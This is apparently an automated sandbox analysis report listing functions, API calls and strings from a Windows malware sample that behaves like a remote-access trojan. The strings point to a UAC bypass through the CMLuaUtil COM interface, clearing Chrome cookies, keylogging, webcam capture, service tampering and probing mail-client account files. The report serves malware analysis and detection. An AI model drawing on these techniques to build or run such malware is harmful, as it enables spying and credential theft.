• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
• Opcode ID: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
• Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
• Opcode Fuzzy Hash: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
• Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D
Uniqueness
• Uniqueness Score: -1.00%

APIs
• CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\Public\Libraries\lhgtogaW.pif), ref: 004075D0
  • Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
  • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
• CoUninitialize.OLE32 ref: 00407629
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: InitializeObjectUninitialize_wcslen
• String ID: C:\Users\Public\Libraries\lhgtogaW.pif$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
• API String ID: 3851391207-1691353511
• Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
• Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
• Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
• Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB
Uniqueness
• Uniqueness Score: -1.00%

APIs
• DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
• GetLastError.KERNEL32 ref: 0040BAE7
Strings
• UserProfile, xrefs: 0040BAAD
• [Chrome Cookies not found], xrefs: 0040BB01
• [Chrome Cookies found, cleared!], xrefs: 0040BB0D
• \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: DeleteErrorFileLast
• String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
• API String ID: 2018770650-304995407
• Opcode ID: 167214da9fedc2eb77704bddeaa2e6e6e0e18728c289feeb4f38cfb7b5f99995
• Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
• Opcode Fuzzy Hash: 167214da9fedc2eb77704bddeaa2e6e6e0e18728c289feeb4f38cfb7b5f99995
• Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE
Uniqueness
• Uniqueness Score: -1.00%

APIs
• __allrem.LIBCMT ref: 0043AC69
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
• __allrem.LIBCMT ref: 0043AC9C
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
• __allrem.LIBCMT ref: 0043ACD1
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
• String ID:
• API String ID: 1992179935-0
• Opcode ID: 62332627f6279ece4fdf0222086194dbbb93a47f3123b1b6f0685f97dcd8be1f
• Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
• Opcode Fuzzy Hash: 62332627f6279ece4fdf0222086194dbbb93a47f3123b1b6f0685f97dcd8be1f
• Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A
Uniqueness
• Uniqueness Score: -1.00%

APIs
• MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,274C6FFD,00000000,?,?,?,274C8A72,?,?,00000100), ref: 274C887B
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,274C8A72,?,?,00000100,5EFC4D8B,?,?), ref: 274C8901
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 274C89FB
• __freea.LIBCMT ref: 274C8A08
  • Part of subcall function 274C56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 274C5702
• __freea.LIBCMT ref: 274C8A11
• __freea.LIBCMT ref: 274C8A36
Memory Dump Source
• Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
• Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
Similarity
• API ID: ByteCharMultiWide__freea$AllocateHeap
• String ID:
• API String ID: 1414292761-0
• Opcode ID: 2e811c892a9d4478e002c97e278a8599a769b05694c12ea03615b31654c61cff
• Instruction ID: 3e945d368367d1693962ae6bb9ab30a5be085774df8d3e4a4406b84f8308b48d
• Opcode Fuzzy Hash: 2e811c892a9d4478e002c97e278a8599a769b05694c12ea03615b31654c61cff
• Instruction Fuzzy Hash: E351F17A610216EBEB15CE64CC82EEF77ADEF90A50F15066CFD05D6240EB35EC50C6A1
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • Sleep.KERNEL32(00000000,0040D262), ref: 004044C4
                                                                                                                                                                      • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prologSleep
                                                                                                                                                                    • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                                                                                                                                                    • API String ID: 3469354165-3054508432
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __cftoe
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4189289331-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • _strlen.LIBCMT ref: 274C1607
                                                                                                                                                                    • _strcat.LIBCMT ref: 274C161D
                                                                                                                                                                    • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,274C190E,?,?,00000000,?,00000000), ref: 274C1643
                                                                                                                                                                    • lstrcatW.KERNEL32(?,?), ref: 274C165A
                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,274C190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 274C1661
                                                                                                                                                                    • lstrcatW.KERNEL32(00001008,?), ref: 274C1686
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1922816806-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • lstrcatW.KERNEL32(?,?), ref: 274C1038
                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 274C104B
                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 274C1061
                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 274C1075
                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 274C1090
                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 274C10B8
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3594823470-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
                                                                                                                                                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
                                                                                                                                                                    • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 493672254-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,274C3518,274C23F1,274C1F17), ref: 274C3864
                                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 274C3872
                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 274C388B
                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,274C3518,274C23F1,274C1F17), ref: 274C38DD
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3852720340-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                                                                                                                    • _free.LIBCMT ref: 0044824C
                                                                                                                                                                    • _free.LIBCMT ref: 00448274
                                                                                                                                                                    • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                                                                                                                                                    • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                                                                                                                    • _abort.LIBCMT ref: 00448293
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3160817290-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,274C6C6C), ref: 274C5AFA
                                                                                                                                                                    • _free.LIBCMT ref: 274C5B2D
                                                                                                                                                                    • _free.LIBCMT ref: 274C5B55
                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,274C6C6C), ref: 274C5B62
                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,274C6C6C), ref: 274C5B6E
                                                                                                                                                                    • _abort.LIBCMT ref: 274C5B74
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3160817290-0
                                                                                                                                                                    • Opcode ID: b9ee603c802171c44c593567693b0d333a26533d816560f102eb1d739e5e115f
                                                                                                                                                                    • Instruction ID: 741182f16d640a872b4473ea9d3323c7f6502cd16f90637fb1b4ddf73fb5e6de
                                                                                                                                                                    • Opcode Fuzzy Hash: b9ee603c802171c44c593567693b0d333a26533d816560f102eb1d739e5e115f
                                                                                                                                                                    • Instruction Fuzzy Hash: BAF0C83E545520EBD307E3396C0AEEFAE699FE1D75F36012CF91896281FE2885434166
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
                                                                                                                                                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
                                                                                                                                                                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 221034970-0
                                                                                                                                                                    • Opcode ID: eda13e38d8a3146ab63ff07a3ca7716483300a79ca53aa78cee06ed6382f1e82
                                                                                                                                                                    • Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
                                                                                                                                                                    • Opcode Fuzzy Hash: eda13e38d8a3146ab63ff07a3ca7716483300a79ca53aa78cee06ed6382f1e82
                                                                                                                                                                    • Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
                                                                                                                                                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
                                                                                                                                                                    • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 221034970-0
                                                                                                                                                                    • Opcode ID: 6e3f17907006f9b14c266842471996563c875abd3fd739ef86307a469298e104
                                                                                                                                                                    • Instruction ID: cdcae22f94af1ce7d279f83afe572816001e75aa845eac4345c2c81124f82824
                                                                                                                                                                    • Opcode Fuzzy Hash: 6e3f17907006f9b14c266842471996563c875abd3fd739ef86307a469298e104
                                                                                                                                                                    • Instruction Fuzzy Hash: 84F0C231501218ABD6116F259C49DFF3B6CDB45B62F40002AFE0996192EB38DD4595F9
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
                                                                                                                                                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
                                                                                                                                                                    • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 221034970-0
                                                                                                                                                                    • Opcode ID: 23a00401f81ef66e1f28e228ef782f054758fa37ca42b77af94f3a0d5dd06f84
                                                                                                                                                                    • Instruction ID: 1af6be829003de2eeb85b71d4b0cbdb2c911632148e7083bdbbda8586ff13133
                                                                                                                                                                    • Opcode Fuzzy Hash: 23a00401f81ef66e1f28e228ef782f054758fa37ca42b77af94f3a0d5dd06f84
                                                                                                                                                                    • Instruction Fuzzy Hash: 2FF0F631501228BBD711AF25EC49DFF3B6CDB45B62F00002AFE0992192EB38CD4595F9
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 274C1E89: lstrlenW.KERNEL32(?,?,?,?,?,274C10DF,?,?,?,00000000), ref: 274C1E9A
                                                                                                                                                                      • Part of subcall function 274C1E89: lstrcatW.KERNEL32(?,?), ref: 274C1EAC
                                                                                                                                                                      • Part of subcall function 274C1E89: lstrlenW.KERNEL32(?,?,274C10DF,?,?,?,00000000), ref: 274C1EB3
                                                                                                                                                                      • Part of subcall function 274C1E89: lstrlenW.KERNEL32(?,?,274C10DF,?,?,?,00000000), ref: 274C1EC8
                                                                                                                                                                      • Part of subcall function 274C1E89: lstrcatW.KERNEL32(?,274C10DF), ref: 274C1ED3
                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 274C122A
                                                                                                                                                                      • Part of subcall function 274C173A: _strlen.LIBCMT ref: 274C1855
                                                                                                                                                                      • Part of subcall function 274C173A: _strlen.LIBCMT ref: 274C1869
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                                                                                    • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                                                    • API String ID: 4036392271-1520055953
                                                                                                                                                                    • Opcode ID: ddcf4ae052102cf1e29855ba581d306a5cc622736d7c8d1aad7f730f18e0ef3c
                                                                                                                                                                    • Instruction ID: fe31530a95f6baa8549977d06e622be541ca09846835edd0e25a6e4f61d99bda
                                                                                                                                                                    • Opcode Fuzzy Hash: ddcf4ae052102cf1e29855ba581d306a5cc622736d7c8d1aad7f730f18e0ef3c
                                                                                                                                                                    • Instruction Fuzzy Hash: D521B4BDA10208AAEB10D794EC91FEE7339EF90B14F10155AFA04EB1D4EAB11D818759
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B172
                                                                                                                                                                    • wsprintfW.USER32 ref: 0040B1F3
                                                                                                                                                                      • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: EventLocalTimewsprintf
                                                                                                                                                                    • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                                                                                                                    • API String ID: 1497725170-248792730
                                                                                                                                                                    • Opcode ID: 8a11c7058c99d287891ca40a959def1c315cce1686fe69983689fdf637a4f704
                                                                                                                                                                    • Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
                                                                                                                                                                    • Opcode Fuzzy Hash: 8a11c7058c99d287891ca40a959def1c315cce1686fe69983689fdf637a4f704
                                                                                                                                                                    • Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • RegisterClassExA.USER32(00000030), ref: 0041D55B
